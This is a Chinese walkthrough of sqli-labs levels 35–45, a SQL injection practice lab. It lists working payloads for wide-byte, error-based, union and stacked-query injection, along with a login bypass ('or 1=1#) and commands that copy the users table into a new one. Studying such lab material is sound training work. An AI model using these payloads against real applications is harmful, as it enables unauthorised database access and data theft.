sqllab第35-45关通关笔记

35关知识点:
  • 宽字节注入
  • 数值型注入
  • 错误注入
    • payload:id=1+and+extractvalue(1,concat(0x7e,database(),0x7e))=0--+
  • 联合注入
    • payload:id=0+union+select+1,database(),version()--+
36关知识点:
  • 字符型注入
  • 宽字节注入
  • 错误注入
    • payload:id=1%df%27and+extractvalue(1,concat(0x7e,database(),0x7e))=0--+
  • 联合注入
    • payload:id=0%df%27union+select+1,database(),version()--+
37关知识点:
  • 宽字节注入(bp抓包实现,不要直接在输入框中输入下面payload)
  • 字符型注入
  • 联合注入
    • payload:uname=1%df'union+select+database(),version()--+
  • 错误注入
    • payload:uname=1%df'and+extractvalue(1,concat(0x7e,database(),0x7e))--+
38关知识点:
  • 字符型注入+单引号闭合
  • 错误注入
    • payload:id=1%27and+extractvalue(1,concat(0x7e,database(),0x7e))=%271
  • 联合注入
    • payload:id=0%27union+select+1,database(),version()--+
39关知识点:
  • 数值型注入
  • 错误注入
    • payload:id=1+and%20extractvalue(1,concat(0x7e,database(),0x7e))=0
  • 联合注入
    • payload:id=0+union+select+1,version(),database()
40关知识点:
  • 字符型注入
    • 测试发现原始语句是 where id=('输入')
  • 联合注入
    • payload:id=0%27)union+select+1,database(),3%20and+1=(%271
  • 没有回显信息,不能进行错误注入
41关知识点:
  • 数值型注入
  • 联合注入
    • payload:id=0%20union+select+1,database(),version()
  • 没有回显信息,不能进行错误注入
  • 堆叠注入
    • payload:id=1;create%20table%20ren(id%20int);--+
42关知识点:
  • 密码位置可以单引号绕过
    • payload:passwd='or+1=1#
  • 堆叠注入
    • payload:passwd=';create table ren like users;# (创建一个新表ren,格式和users一样)
    • payload:passwd=';insert into ren select * from users;# (将users的内容插入到ren表中)
43关知识点:
  • 密码处读取输入为 where passwd=('输入')
    • payload:passwd=1')or 1=1#
  • 堆叠注入
    • payload:passwd=');create table ren like users;# (创建一个新表ren,格式和users一样)
    • payload:passwd=');insert into ren select * from users;# (将users的内容插入到ren表中)
44关知识点:
  • 和42关的payload一模一样
  • 直接过了
45关知识点:
  • 和43关一样的payload
  • 直接过了

10

相关推荐
chushiyunen2 分钟前
dom操作笔记、xml和document等
xml·java·笔记
chushiyunen4 分钟前
tomcat使用笔记、启动失败但是未打印日志
java·笔记·tomcat
汇能感知9 分钟前
光谱相机的光谱数据采集原理
经验分享·笔记·科技
人人题32 分钟前
汽车加气站操作工考试答题模板
笔记·职场和发展·微信小程序·汽车·创业创新·学习方法·业界资讯
小脑斧爱吃鱼鱼1 小时前
鸿蒙项目笔记(1)
笔记·学习·harmonyos
lulinhao2 小时前
HCIA/HCIP基础知识笔记汇总
网络·笔记
杉之3 小时前
SpringBlade 数据库字段的自动填充
java·笔记·学习·spring·tomcat
WarPigs3 小时前
blender场景导入Unity的流程(个人总结)
笔记
小杨爱学习zb5 小时前
学习总结 网格划分+瞬态求解设置
笔记·学习·算法
互联网上的猪6 小时前
Excel时间类型函数(包括today、date、eomonth、year、month、day、weekday、weeknum、datedif)
笔记·学习·excel